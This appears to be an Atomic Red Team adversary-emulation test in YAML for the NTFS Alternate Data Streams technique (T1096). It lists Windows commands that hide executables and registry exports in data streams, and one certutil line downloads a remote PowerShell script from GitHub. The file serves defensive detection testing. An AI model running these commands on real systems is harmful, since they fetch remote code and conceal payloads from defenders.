Carrie Roberts
1bfefdacfc
* provide elevation_required attribute * provide elevation_required attribute * provide elevation_required attribute
37 lines
1.4 KiB
YAML
37 lines
1.4 KiB
YAML
---
|
|
attack_technique: T1096
|
|
display_name: NTFS File Attributes
|
|
|
|
atomic_tests:
|
|
- name: Alternate Data Streams (ADS)
|
|
description: |
|
|
Execute from Alternate Streams
|
|
|
|
[Reference - 1](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)
|
|
|
|
[Reference - 2](https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/)
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
input_arguments:
|
|
path:
|
|
description: Path of ADS file
|
|
type: path
|
|
default: c:\ADS\
|
|
|
|
executor:
|
|
name: command_prompt
|
|
elevation_required: true
|
|
command: |
|
|
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
|
|
extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe
|
|
findstr /V /L W3AllLov3DonaldTrump #{path}\procexp.exe > #{path}\file.txt:procexp.exe
|
|
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
|
|
makecab #{path}\autoruns.exe #{path}\cabtest.txt:autoruns.cab
|
|
print /D:#{path}\file.txt:autoruns.exe #{path}\Autoruns.exe
|
|
reg export HKLM\SOFTWARE\Microsoft\Evilreg #{path}\file.txt:evilreg.reg
|
|
regedit /E #{path}\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
|
|
expand \\webdav\folder\file.bat #{path}\file.txt:file.bat
|
|
esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o
|